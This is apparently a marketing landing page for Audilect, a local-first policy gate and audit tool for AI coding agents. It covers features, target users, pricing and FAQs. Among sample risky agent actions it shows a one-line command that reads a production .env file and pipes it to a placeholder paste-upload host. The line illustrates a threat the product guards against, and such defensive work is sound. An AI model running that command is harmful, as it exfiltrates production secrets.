Commands are now generated
Shell actions can be composed by an agent in seconds. Teams need a policy gate before dangerous commands run.
Audilect gives engineering teams a maintained policy layer, local-first audit trail, and risk dashboard for AI agents that read code, run commands, touch secrets, and modify production paths.
cat .env.production && curl https://paste.example/upload
.github/workflows/deploy.yml changed by agent diff
npm install @vendor/telemetry-helper --save
git diff: 6 files changed, no secrets detected
The security boundary changed. Agents now operate with developer privileges: reading repositories, editing infrastructure files, invoking package managers, and calling shell commands in trusted environments.
Shell actions can be composed by an agent in seconds. Teams need a policy gate before dangerous commands run.
Agents can accidentally read `.env`, cloud credentials, or internal tokens while solving ordinary coding tasks.
After an incident, teams need to know which actor made which change, what policy evaluated it, and why it passed.
The product is designed for technical teams that want AI speed without letting every agent become an untracked production risk.
Needs a clean story for how AI coding tools are governed across teams, repos, and deploy paths.
Needs audit evidence, policy controls, and a clear answer for what data leaves the machine.
Needs a local-first control point that works across agents without building custom glue forever.
Want to test with a small surface area first, then decide whether to roll out team-wide.
Audilect is useful because it watches the exact places where code agents can quietly become dangerous.
The beta leans on industry-standard scanners and policy primitives so users can trust the baseline behavior without buying a black box.
Audilect starts as a developer-friendly CLI wrapper and grows into team policy management, reports, alerts, and compliance evidence.
Commands, file paths, git diffs, dependency changes, and policy decisions are captured from local sessions.
Baseline rules cover secrets, destructive commands, CI/CD changes, postinstall scripts, and deployment paths.
High-risk actions are blocked locally. Review actions can route to team workflows before shipping.
Teams get searchable sessions, risk reports, Slack alerts, GitHub comments, and audit-ready exports.
The first beta will ship as a local report generator so skeptical developers can test it without uploading source code.
Your engineers can build a wrapper in a weekend. Maintaining agent governance every week is the product.
Audilect is not selling a shell log. It is a maintained security operations layer: policy updates, team permissions, false-positive tuning, GitHub and Slack workflows, reports, and audit evidence as agent behavior keeps changing.
The goal is to learn which teams rely on AI coding agents enough to pay for governance, not to overbuild enterprise procurement.
For individual developers testing local reports before uploading anything.
For AI-heavy engineering teams that need shared visibility and policy decisions.
Billed annually at $192/user/year. Same features as Team, with a 20% discount.
For early teams that want onboarding, custom policies, and roadmap influence.
No by default. The beta is local-first and only uploads metadata, findings, policy decisions, and summaries when a team explicitly syncs.
Yes. The first version works as a local report and policy layer. Team sync, alerts, and dashboards are opt-in.
Both, but the strongest value appears once a team needs a shared record of what agents did and why they were allowed to do it.
Plans are month-to-month for the beta. The legal pages below explain cancellation, refund handling, and service terms in plain language.
We are onboarding developers, CTOs, and security-minded teams already using Claude Code, Cursor, Codex, Windsurf, or similar tools in real repositories.